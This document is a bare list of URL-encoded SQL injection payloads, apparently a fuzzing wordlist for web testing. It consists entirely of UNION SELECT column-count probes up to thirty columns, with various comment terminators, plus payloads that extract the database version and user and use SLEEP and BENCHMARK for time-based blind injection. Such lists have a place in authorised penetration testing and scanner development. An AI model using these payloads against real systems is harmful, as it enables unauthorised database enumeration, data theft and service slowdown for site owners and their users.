%27%27%27%27%27%27%27%27%27%27%27%27%27UNION%20SELECT%20%272
-1%27%20UNION%20SELECT%201%2C2%2C3--%2B
%27%20UNION%20SELECT%20sum%28columnname%29%20from%20tablename%20--
-1%20UNION%20SELECT%201%20INTO%20%40%2C%40
-1%20UNION%20SELECT%201%20INTO%20%40%2C%40%2C%40
UNION%20ALL%20SELECT%201
UNION%20ALL%20SELECT%201%2C2
UNION%20ALL%20SELECT%201%2C2%2C3
UNION%20ALL%20SELECT%201%2C2%2C3%2C4
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30
UNION%20ALL%20SELECT%201%23
UNION%20ALL%20SELECT%201%2C2%23
UNION%20ALL%20SELECT%201%2C2%2C3%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%23
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%23
UNION%20ALL%20SELECT%201--
UNION%20ALL%20SELECT%201%2C2--
UNION%20ALL%20SELECT%201%2C2%2C3--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29--
UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30--
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2C3
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2C4
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2C%22%273
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2C%22%273%27%22%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2C4%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%23
UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%23
UNION%20ALL%20SELECT%20USER%28%29--
UNION%20ALL%20SELECT%20SLEEP%285%29--
UNION%20ALL%20SELECT%20USER%28%29%2CSLEEP%285%29--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
UNION%20ALL%20SELECT%20%40%40VERSION%2CUSER%28%29%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--
